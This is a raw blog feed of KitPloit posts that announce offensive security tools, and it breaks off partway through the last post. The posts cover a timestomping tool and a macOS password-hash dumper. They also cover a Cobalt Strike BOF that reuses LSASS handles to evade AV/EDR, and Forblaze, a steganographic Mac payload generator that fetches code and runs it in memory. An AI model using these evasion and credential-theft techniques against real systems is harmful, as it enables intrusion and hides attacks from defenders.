tag:blogger.com,1999:blog-83172222311336605472024-03-19T02:21:46.575-03:00KitPloit - PenTest & Hacking ToolsKitPloit - leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security ☣Unknownnoreply@blogger.comBlogger993125tag:blogger.com,1999:blog-8317222231133660547.post-57060626581559714362024-01-31T08:30:00.001-03:002024-01-31T08:30:00.132-03:00Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjGwlVXosv8tPSN6WLhyGjxgcf5CIjlQNhtsx3vEfrgwo7kcxiyjS3JuLyYAaF_NX-jzO5qARKDOdnziTr7LEYVXO1Fqvcvvgh_UOpMrpoai2Ad3fehvpjqMMSaJJkOg7-iJdnBfNrFoxM-vo4Qyxmg4yVutAFTXJXjSkL4ba-es5ZESHAE72ifLkY1nF56"><img alt="" border="0" height="102" id="BLOGGER_PHOTO_ID_7310072158277616962" src="https://blogger.googleusercontent.com/img/a/AVvXsEjGwlVXosv8tPSN6WLhyGjxgcf5CIjlQNhtsx3vEfrgwo7kcxiyjS3JuLyYAaF_NX-jzO5qARKDOdnziTr7LEYVXO1Fqvcvvgh_UOpMrpoai2Ad3fehvpjqMMSaJJkOg7-iJdnBfNrFoxM-vo4Qyxmg4yVutAFTXJXjSkL4ba-es5ZESHAE72ifLkY1nF56=w640-h102" width="640" /></a></p><br /> <p dir="auto">A <a href="https://www.kitploit.com/search/label/PowerShell" target="_blank" title="PowerShell">PowerShell</a> function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.</p> <ul dir="auto"> <li>Change timestamps for individual files or directories.</li> <li>Recursively apply timestamps to all files in a directory.</li> <li>Option to use specific <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> for <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="remote">remote</a> paths or privileged files.</li> </ul><span><a name='more'></a></span><div><br /></div> <p dir="auto">I've ported Stompy to C#, Python and Go and the relevant versions are linked in this repo with their own readme.</p> <ul dir="auto"> <li><a href="https://github.com/ZephrFish/Stompy/tree/main/StompySharps" rel="nofollow" target="_blank" title="C# version">C# version</a>.</li> <li><a href="https://github.com/ZephrFish/Stompy/tree/main/StomPY" rel="nofollow" target="_blank" title="Python">Python</a></li> <li><a href="https://github.com/ZephrFish/Stompy/tree/main/GoStompy" rel="nofollow" target="_blank" title="Go">Go</a></li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <ul dir="auto"> <li><code>-Path</code>: The path to the file or <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> whose timestamps you wish to modify.</li> <li><code>-NewTimestamp</code>: The new DateTime value you wish to set for the file or directory.</li> <li><code>-Credentials</code>: (Optional) If you need to specify a different user's credentials.</li> <li><code>-Recurse</code>: (Switch) If specified, apply the timestamp recursively to all files in the given directory.</li> </ul> <h2 dir="auto" tabindex="-1">Usage Examples</h2> <p dir="auto">Specify the <code>-Recurse</code> switch to apply timestamps recursively:</p> <ol dir="auto"> <li>Change the timestamp of an individual file:</li> </ol> <div><pre><code>Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"<br /></code></pre></div> <ol dir="auto" start="2"> <li>Recursively change timestamps for all files in a directory:</li> </ol> <div><pre><code>Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse <br /></code></pre></div> <ol dir="auto" start="3"> <li>Use specific credentials:</li> </ol> <div>Demo: <p dir="auto" style="text-align: center;"><a href="https://private-user-images.githubusercontent.com/5783068/275293700-0ba615ca-ba50-4435-be5c-2e9b0983bc2b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTEiLCJleHAiOjE3MDIwMDkwODYsIm5iZiI6MTcwMjAwODc4NiwicGF0aCI6Ii81NzgzMDY4LzI3NTI5MzcwMC0wYmE2MTVjYS1iYTUwLTQ0MzUtYmU1Yy0yZTliMDk4M2JjMmIucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQUlXTkpZQVg0Q1NWRUg1M0ElMkYyMDIzMTIwOCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyMzEyMDhUMDQxMzA2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MjEwZjhlNWU0NGJjYjkzMTU4NjFmOTU5ZTI4ZjE1OGY4NGMwNDVlMmQzMWJkYTAwYzAwZDhmNTdiNWZkZDgzZiZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.TwR9vrk1dgtnrb13qz2S0rOB1wq-nQq2vvdsFD8nsTc" rel="nofollow" target="_blank" title="Timestomp Tool to flatten MAC times with a specific timestamp (8)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjGwlVXosv8tPSN6WLhyGjxgcf5CIjlQNhtsx3vEfrgwo7kcxiyjS3JuLyYAaF_NX-jzO5qARKDOdnziTr7LEYVXO1Fqvcvvgh_UOpMrpoai2Ad3fehvpjqMMSaJJkOg7-iJdnBfNrFoxM-vo4Qyxmg4yVutAFTXJXjSkL4ba-es5ZESHAE72ifLkY1nF56"><img alt="" border="0" height="102" id="BLOGGER_PHOTO_ID_7310072158277616962" src="https://blogger.googleusercontent.com/img/a/AVvXsEjGwlVXosv8tPSN6WLhyGjxgcf5CIjlQNhtsx3vEfrgwo7kcxiyjS3JuLyYAaF_NX-jzO5qARKDOdnziTr7LEYVXO1Fqvcvvgh_UOpMrpoai2Ad3fehvpjqMMSaJJkOg7-iJdnBfNrFoxM-vo4Qyxmg4yVutAFTXJXjSkL4ba-es5ZESHAE72ifLkY1nF56=w640-h102" width="640" /></a></p> <p dir="auto" style="text-align: center;"><a href="https://private-user-images.githubusercontent.com/5783068/275293734-e8f9ae8e-bcdd-4a1d-8d68-7f787021164e.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTEiLCJleHAiOjE3MDIwMDkwODYsIm5iZiI6MTcwMjAwODc4NiwicGF0aCI6Ii81NzgzMDY4LzI3NTI5MzczNC1lOGY5YWU4ZS1iY2RkLTRhMWQtOGQ2OC03Zjc4NzAyMTE2NGUucG5nP1gtQW16LUFsZ29yaXRobT1BV1M0LUhNQUMtU0hBMjU2JlgtQW16LUNyZWRlbnRpYWw9QUtJQUlXTkpZQVg0Q1NWRUg1M0ElMkYyMDIzMTIwOCUyRnVzLWVhc3QtMSUyRnMzJTJGYXdzNF9yZXF1ZXN0JlgtQW16LURhdGU9MjAyMzEyMDhUMDQxMzA2WiZYLUFtei1FeHBpcmVzPTMwMCZYLUFtei1TaWduYXR1cmU9MmFlNjQwYzZmZGIzZmEyMGQwNzA5NWNjMTM2ZDZmMDQ3OWM5YmIyMjdmMWM1NjI1NGNiZTVlMmQxZjRmNWZkZCZYLUFtei1TaWduZWRIZWFkZXJzPWhvc3QmYWN0b3JfaWQ9MCZrZXlfaWQ9MCZyZXBvX2lkPTAifQ.Zm7Ztbizq_WAtkHu08_1Irz9p6alNcxz5V9f5AGvL5s" rel="nofollow" target="_blank" title="Timestomp Tool to flatten MAC times with a specific timestamp (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi5DNraOX8EbEmhcOjjuIZmOvGY36PQMULK-R7WS33GNDSlrXpW-oNwTnjS6Zrya6oLfQjmzAZBp8viHC6H0BK2Qyx6_gpFn4oD3GCbDjjhAyUbpk8_zU4AO_P38E8QwYMi8Yp7q0oPRZ9z_6eELWWqg-AKR1qQqRWdMN5RUFTXDCWpv9dRpDLOoeOhEx1k"><img alt="" border="0" height="44" id="BLOGGER_PHOTO_ID_7310072184883724114" src="https://blogger.googleusercontent.com/img/a/AVvXsEi5DNraOX8EbEmhcOjjuIZmOvGY36PQMULK-R7WS33GNDSlrXpW-oNwTnjS6Zrya6oLfQjmzAZBp8viHC6H0BK2Qyx6_gpFn4oD3GCbDjjhAyUbpk8_zU4AO_P38E8QwYMi8Yp7q0oPRZ9z_6eELWWqg-AKR1qQqRWdMN5RUFTXDCWpv9dRpDLOoeOhEx1k=w640-h44" width="640" /></a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/ZephrFish/Stompy" rel="nofollow" target="_blank" title="Download Stompy">Download Stompy</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-25774842681066935332023-12-13T08:30:00.005-03:002023-12-13T08:30:00.125-03:00Osx-Password-Dumper - A Tool To Dump Users'S .Plist On A Mac OS System And To Convert Them Into A Crackable Hash <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQs_8qRTpoldjWjs33Qrxziw9fDii990RF6rMB1Va3K1bNHDxfblXo0q46dBNg6ApEsftEbFGnfhue8r5U9DZrMFw8spHOI9yHUH9uJcCNF_vx7Ry35RLixdm1TSF7YmXevdeRkSVInrYNKsM-QaKpUQJSD0BECtxiVPs9fIMVhEo1rMmra1ZsdN9JQvEd/s1792/Osx-Password-Dumper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQs_8qRTpoldjWjs33Qrxziw9fDii990RF6rMB1Va3K1bNHDxfblXo0q46dBNg6ApEsftEbFGnfhue8r5U9DZrMFw8spHOI9yHUH9uJcCNF_vx7Ry35RLixdm1TSF7YmXevdeRkSVInrYNKsM-QaKpUQJSD0BECtxiVPs9fIMVhEo1rMmra1ZsdN9JQvEd/w640-h366/Osx-Password-Dumper.png" width="640" /></a></div><p><br /></p><h1 dir="auto" tabindex="-1"> OSX Password <a href="https://www.kitploit.com/search/label/Dumper" target="_blank" title="Dumper">Dumper</a> Script</h1> <h2 dir="auto" tabindex="-1">Overview</h2> <p dir="auto">A bash script to retrieve user's .plist files on a macOS system and to convert the data inside it to a crackable hash format. (to use with John The Ripper or Hashcat)</p> <p dir="auto">Useful for CTFs/Pentesting/Red Teaming on macOS systems.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Prerequisites</h2> <ul dir="auto"> <li>The script must be run as a root user (<code>sudo</code>)</li> <li>macOS environment (tested on a macOS VM Ventura beta 13.0 (22A5266r))</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>sudo ./osx_password_cracker.sh OUTPUT_FILE /path/to/save/.plist</code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JeanPeyreMesMots/osx-password-dumper" rel="nofollow" target="_blank" title="Download Osx-Password-Dumper">Download Osx-Password-Dumper</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-56670650266448379172022-06-01T10:00:00.000-04:002022-06-01T10:00:02.122-04:00PowerGram - Multiplatform Telegram Bot In Pure PowerShell<p align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7103840857639290338" src="https://blogger.googleusercontent.com/img/a/AVvXsEjehzbXT_1fjmcs2YwFwlbW74hUJKZuMgZlOGah8e0R1rSiam777CAHBIkMpBfqCJX0Ku_nztSoQ7V11MYotzEqyCXCJMOyoRQHpOgyxgAns2bM9gEz4KszUC2CVxpwTiYKu2sB6_kjqJnJdaiZfSidRZJJMA-PpsPI13DJWQm1VnjpE-2bLvbJFSQB=w640-h400" width="640" /></a></p><p align="center" dir="auto"><br /></p> <p dir="auto"><strong>PowerGram</strong> is a pure <a href="https://www.kitploit.com/search/label/PowerShell" target="_blank" title="PowerShell">PowerShell</a> <a href="https://www.kitploit.com/search/label/Telegram" target="_blank" title="Telegram">Telegram</a> Bot that can be run on Windows, <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> or Mac OS. To make use of it, you only need PowerShell 4 or higher and an internet connection.</p> <p dir="auto">All communication between the Bot and Telegram servers is encrypted with HTTPS, but all requests will be sent in GET method, so they could easily be intercepted.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Requirements</h1> <ul dir="auto"> <li>PowerShell 4.0 or greater</li> </ul> <h1 dir="auto">Download</h1> <p dir="auto">It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <div><pre><code>git clone https://github.com/JoelGMSec/PowerGram<br /></code></pre></div> <h1 dir="auto">Usage</h1> <div><pre><code>.\PowerGram -h<br /><br /> ____ ____ <br /> | _ \ __ __ __ __ _ __ / ___|_ __ __ _ _ __ ___ <br /> | |_) / _ \ \ /\ / / _ \ '__| | _| '__/ _' | '_ ' _ \ <br /> | __/ (_) \ V V / __/ | | |_| | | | (_| | | | | | | <br /> |_| \___/ \_/\_/ \___|_| \____|_| \__,_|_| |_| |_| <br /><br /> ------------------- by @JoelGMSec ------------------- <br /><br /> Info: PowerGram is a pure PowerShell Telegram Bot<br /> that can be run on Windows, Linux or Mac OS<br /><br /> Usage: PowerGram from PowerShell<br /> .\PowerGram.ps1 -h Show this help message<br /> .\PowerGram.ps1 -run Start PowerGram Bot<br /><br /> PowerGram from Telegram<br /> /getid Get your Chat ID from Bot<br /> /help Show all available commands<br /><br /> Warning: All commands will be sent using HTTPS GET requests<br /> You need your Chat ID & Bot Token to run PowerGram<br /><br /></code></pre></div> <h3 dir="auto">The detailed guide of use can be found at the following link:</h3> <p dir="auto"><a href="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell" rel="nofollow" target="_blank" title="https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell">https://darkbyte.net/powergram-un-sencillo-bot-para-telegram-escrito-en-powershell</a></p> <h1 dir="auto">License</h1> <p dir="auto">This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <h1 dir="auto">Credits and Acknowledgments</h1> <p dir="auto">This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec</p> <h1 dir="auto">Contact</h1> <p dir="auto">This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p dir="auto">For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p><p dir="auto"><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/PowerGram" rel="nofollow" target="_blank" title="Download PowerGram">Download PowerGram</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-39634913198849050772021-07-07T17:30:00.006-04:002021-07-07T17:30:00.294-04:00FindObjects-BOF - A Cobalt Strike Beacon Object File (BOF) Project Which Uses Direct System Calls To Enumerate Processes For Specific Loaded Modules Or Process Handles<div style="text-align: center;"><a href="http://1.bp.blogspot.com/-OOZR209Jz84/YNkP2SrwTmI/AAAAAAAAeqY/LYN79sEKYR4JkJD7KGv5J7a61KjlAQtHgCK4BGAYYCw/s1600/FindObjects-BOF_1_FindObjects-700101.png"><img alt="" border="0" height="348" id="BLOGGER_PHOTO_ID_6978626522990005858" src="http://1.bp.blogspot.com/-OOZR209Jz84/YNkP2SrwTmI/AAAAAAAAeqY/LYN79sEKYR4JkJD7KGv5J7a61KjlAQtHgCK4BGAYYCw/w640-h348/FindObjects-BOF_1_FindObjects-700101.png" width="640" /></a></div><br /> <p>A <a href="https://www.kitploit.com/search/label/Cobalt%20Strike" target="_blank" title="Cobalt Strike">Cobalt Strike</a> Beacon Object File (BOF) project which uses <a href="https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/" rel="nofollow" target="_blank" title="direct system calls">direct system calls</a> to enumerate processes for specific modules or process handles.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>What is this repository for?</b></span><br /> <ul> <li>Use direct systems calls within Beacon Object files to enumerate processes for specific loaded modules (e.g. winhttp.dll, amsi.dll or clr.dll).</li> <li>Use direct systems calls within Beacon Object files to enumerate processes for specific process handles (e.g. lsass.exe).</li> <li>Avoid using the <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Native APIs as much as possible (to avoid <a href="https://www.kitploit.com/search/label/UserLAnd" target="_blank" title="userland">userland</a> hooks).</li> <li>Execute this code within the beacon process using <a href="https://www.cobaltstrike.com/help-beacon-object-files" rel="nofollow" target="_blank" title="Beacon object files">Beacon object files</a> to avoid fork&run.</li> </ul> <br /><span style="font-size: large;"><b>Why do i need this?</b></span><br /> <p>Utilizing <a href="https://outflank.nl/blog/2020/12/26/direct-syscalls-in-beacon-object-files/" rel="nofollow" target="_blank" title="direct systems calls via inline">direct systems calls via inline </a><a href="https://www.kitploit.com/search/label/Assembly" target="_blank" title="assembly">assembly</a> in BOF code provides a more opsec safe way of interacting with the system. Using direct system calls avoids AV/EDR software intercepting user-mode API calls.</p> <ul> <li> <p>The <code>FindModule</code> bof can be used to identify processes which have a certain module loaded, for example the .NET runtime <code>clr.dll</code> or the <code>winhttp.dll</code> module. This information can be used to select a more opsec safe spawnto candidate when using Cobalt Strike's <code>execute-assembly</code> or before injecting an exfill beacon shellcode using the <code>shinject</code> command.</p> <p style="text-align: center;"><a href="https://github.com/outflanknl/FindObjects-BOF/blob/main/images/FindObjects.png" rel="nofollow" target="_blank" title="A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles. (8)"></a><a href="http://1.bp.blogspot.com/-OOZR209Jz84/YNkP2SrwTmI/AAAAAAAAeqY/LYN79sEKYR4JkJD7KGv5J7a61KjlAQtHgCK4BGAYYCw/s1600/FindObjects-BOF_1_FindObjects-700101.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6978626522990005858" src="http://1.bp.blogspot.com/-OOZR209Jz84/YNkP2SrwTmI/AAAAAAAAeqY/LYN79sEKYR4JkJD7KGv5J7a61KjlAQtHgCK4BGAYYCw/s320/FindObjects-BOF_1_FindObjects-700101.png" /></a></p> </li> <li> <p>The <code>FindProcHandle</code> bof can be used to identify processes with a specific process handle in use, for example processes using a handle to the <code>lsass.exe</code> process. If there's a process within the system with a <code>lsass.exe</code> process handle, we could use this existing process/handle to read or write memory without opening a new process handle. This bypasses certain AV/EDR's capabilities of detecting and blocking LSASS process/memory access.</p> <p style="text-align: center;"><a href="https://github.com/outflanknl/FindObjects-BOF/blob/main/images/FindProcHandle.png" rel="nofollow" target="_blank" title="A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles. (9)"></a><a href="http://3.bp.blogspot.com/-HoWr_06DQJ0/YNkP4FDXFEI/AAAAAAAAeqo/gEDukpNxbp8HrkUZfC3dWy77WV4_pCYwgCK4BGAYYCw/s1600/FindObjects-BOF_2_FindProcHandle-706958.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_6978626553690657858" src="http://3.bp.blogspot.com/-HoWr_06DQJ0/YNkP4FDXFEI/AAAAAAAAeqo/gEDukpNxbp8HrkUZfC3dWy77WV4_pCYwgCK4BGAYYCw/s320/FindObjects-BOF_2_FindProcHandle-706958.png" /></a></p> </li> </ul> <br /><span style="font-size: large;"><b>How do I set this up?</b></span><br /> <p>We will not supply compiled binaries. You will have to do this yourself:</p> <ul> <li>Clone this repository.</li> <li>Make sure you have the Mingw-w64 <a href="https://www.kitploit.com/search/label/Compiler" target="_blank" title="compiler">compiler</a> installed. On Mac OSX for example, you can use the ports collection to install Mingw-w64 (<code>sudo port install mingw-w64</code>).</li> <li>Run the <code>make</code> command to compile the Beacon object file.</li> <li>Within Cobalt Strike use the <code>Script Manager</code> to load the <strong>FindObjects.cna</strong> script.</li> <li>Within a Cobalt Strike beacon context use the <code>FindProcHandle</code> or <code>FindModule</code> command with the required parameters (e.g. module or process name).</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/outflanknl/FindObjects-BOF" rel="nofollow" target="_blank" title="Download FindObjects-BOF">Download FindObjects-BOF</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-30001967624988335312021-07-03T17:30:00.001-04:002021-07-03T17:30:00.299-04:00MacHound - An extension to audit Bloodhound collecting and ingesting of Active Directory relationships on MacOS hosts<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-kznhb4h6IhU/YN5jzaUo0UI/AAAAAAAAfjo/xjEEeEq1O-YSz0ssS37DYgwVOLcQNi91gCNcBGAsYHQ/s400/bloodhound.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="400" data-original-width="400" src="https://1.bp.blogspot.com/-kznhb4h6IhU/YN5jzaUo0UI/AAAAAAAAfjo/xjEEeEq1O-YSz0ssS37DYgwVOLcQNi91gCNcBGAsYHQ/s16000/bloodhound.png" /></a></div><p><br /></p> <p>MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> relationships on MacOS hosts. MacHound collects information about logged-in users, and administrative group members on Mac machines and ingest the information into the Bloodhound database. In addition to using the HasSession and AdminTo edges, MacHound adds three new edges to the Bloodhound database:</p> <ul> <li>CanSSH - entity allowed to SSH to host</li> <li>CanVNC - entity allowed to VNC to host</li> <li>CanAE - entity allowed to execute AppleEvent scripts on host</li> </ul> <p>To read more about MacHound, refer to the <a href="https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6" rel="nofollow" target="_blank" title="introduction post">introduction post</a></p><span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Data Collection</b></span><br /> <br /><span style="font-size: large;"><b>Logged-in users (HasSession)</b></span><br /> <p>MacHound uses the utmpx API to query currently active users and OpenDirectory and membership API to validate Active Directory users.</p> <br /><span style="font-size: large;"><b>Administrative Groups</b></span><br /> <p>MacHound collects Active Directory members of the following local administrative groups:</p> <br /><b>admin</b><br /> <p>The local administrative groups, allowing for root operations.</p> <br /><b>com.apple.access_ssh</b><br /> <p>Members of this local group are allowed to access the remote login service (SSH).</p> <br /><b>com.apple.remote_ae</b><br /> <p>Members of this local group are allowed to remotely execute AppleEvent scripts.</p> <br /><b>com.apple.access_screensharing</b><br /> <p>Members of this local group are allowed to access the screen sharing service (VNC)</p> <br /><span style="font-size: x-large;"><b>Components</b></span><br /> <p>MacHound is split into two main components: the collector and the ingestor.</p> <br /><b>Collector</b><br /> <p>The MacHound collector is a Python3.7 scripts that run locally on Active Directory joined MacOS hosts. The collector queries the local OpenDirectory and the Active Directory for information about priviliged users and groups. The output of the execution is a JSON file that contains all the collected information.</p> <br /><b>Ingestor</b><br /> <p>The MacHound ingestor is a Python3.7 script that parses the output JSON files (one per host), connects to the neo4j database and inserts the edges to the database. The ingestor uses the neo4j <a href="https://www.kitploit.com/search/label/Library" target="_blank" title="library">library</a> for Python to query information to and from the neo4j database. The ingestor must be executed on a host that has TCP access to the neo4j database.</p> <br /><span style="font-size: x-large;"><b>Getting Started</b></span><br /> <br /><span style="font-size: large;"><b>Requirements</b></span><br /> <p>MacHound requires Python3.7. The ingestor requires the neo4j library for Python3.7. </p> <br /><span style="font-size: large;"><b>Collector</b></span><br /> <br /><b>Deployment</b><br /> <p>The Collector should be deployed and executed locally on Macs. The output is stored locally and needs to be transfered to the host running the ingestor. The collector depends on builtin libraries in Python3.7 and does not require additional installations. MacHound can be compiled as an Application using the py2app library to ease the deployment.</p> <br /><b>Usage</b><br /> <p>The Collector takes no arguments by default queries all information, and writes the output file into ./output.json. The Collector must be executed as a root user.</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="collector.py -o <output_file> -c <Admin,CanSSH,CanVNC,CanAE,HasSession> [-v] [-l log_file_path] "><pre><code>collector.py -o <output_file> -c <Admin,CanSSH,CanVNC,CanAE,HasSession> [-v] [-l log_file_path]<br /></code></pre></div> <br /><span style="font-size: large;"><b>Ingestor</b></span><br /> <p>The Ingestor should be deployed on a host that has direct TCP connection to Bloodhound's neo4j database, preferably locally on the neo4j database server to avoid security risks. The ingestor requires the installation of neo4j driver for Python (see <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> file).</p> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="ingestor.py <url_to_neo4j> -u <username> -p <password> -i <json_folder> "><pre><code>ingestor.py <url_to_neo4j> -u <username> -p <password> -i <json_folder><br /></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/XMCyber/MacHound" rel="nofollow" target="_blank" title="Download MacHound">Download MacHound</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-9390952028331812542021-06-30T08:30:00.001-04:002021-06-30T08:30:00.299-04:00Forblaze - A Python Mac Steganography Payload Generator<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-dD9M-8L7iCk/YNEsjCqJ-qI/AAAAAAAAdjs/9WDKNMiP2L8vCnuXu14BLe5rxmz7aV8CgCNcBGAsYHQ/s875/Forblaze.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="875" height="214" src="https://1.bp.blogspot.com/-dD9M-8L7iCk/YNEsjCqJ-qI/AAAAAAAAdjs/9WDKNMiP2L8vCnuXu14BLe5rxmz7aV8CgCNcBGAsYHQ/w640-h214/Forblaze.png" width="640" /></a></div><p><br /></p> <p>Forblaze is a project designed to provide steganography capabilities to Mac OS payloads. Using python3, it will build an Obj-C file for you which will be compiled to pull desired encrypted URLs out of the stego file, fetch payloads over https, and execute them directly into memory. It utilizes custom <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> - it is not cryptographically secure, but purely to thwart <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> by AV engines. It is a slight deviation on my previously built custom encryption for Windows, called Rubicon, and is more simple in practice. Forblaze utilizes header and footer bytes to identify where in the stego file your encrypted bytes are, and then decrypts them with a hard-coded key in compile_forblaze.m. This key can be saved and re-used, with the effect that a different URL could be used to fetch a differ ent payload, and the same compiled forblaze should still be able to execute and process it (provided the header and footer bytes aren't changed, and the new stego file is uploaded to the correct location.)</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requirements:</b></span><br /> <p>Python3 (only tested with Python3.9+), and some associated Python libraries - pip3 should take care of any python dependencies you need. In addition, clang will be used for compilation, and forblaze should be run on a mac so that forblaze can be correctly compiled.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>usage: forblaze_url.py [-h] [-innocent_path PATH] [-o OUTPUT] [-len_key LENGTH_OF_KEY] [-compile_file COMPILE_FILE] [-url_to_encrypt URL] [-supply_key SUPPLIED_KEY] [-stego_location STEGO_LOCATION] [-compiled_binary COMPILED_BINARY]</p> <p>Generate stego for implants.</p> <p>optional arguments:</p> <p>-h, --help show this help message and exit</p> <p>-innocent_path PATH Provide the full path to the innocent file to be used.</p> <p>-o OUTPUT Provide the path where you want your stego file to be placed.</p> <p>-len_key LENGTH_OF_KEY Provide a positive integer that will be the length of the key in bytes. Default is 16. Must be between 10 and 150 bytes. You can change this yourself, just be wary that larger key sizes will add bloat to your payload and are not necessarily going to make your encryption stronger</p> <p>-compile_file COMPILE_FILE Provide the path to the C++ file you want to edit.</p> <p>-url_to_encrypt URL Provide the URL you want to stick inside the compile file.</p> <p>-supply_key SUPPLIED_KEY If you wish to use a specific key, provide it here. It must be in the format: -supply_key "\x6e\x60\x..." - aka two double slashes are needed between each byte, or else it WILL NOT WORK.</p> <p>-stego_location STEGO_LOCATION You must provide a location on target where the stego file will reside. It is wise to follow strict full paths: /Users/<>/Documents/file.jpg for example.</p> <p>-compiled_binary COMPILED_BINARY Give the name of the compiled binary to extract the URL and run code in memory from the stego file. The default is forblaze.</p> <br /><span style="font-size: large;"><b>Opsec Concerns</b></span><br /> <p>Honestly, not too many. Mac OS detections are still pretty poor, especially for in-memory activity. However, as a warning, this method (based almost entirely on <a href="https://blogs.blackberry.com/en/2017/02/running-executables-on-macos-from-memory" rel="nofollow" target="_blank" 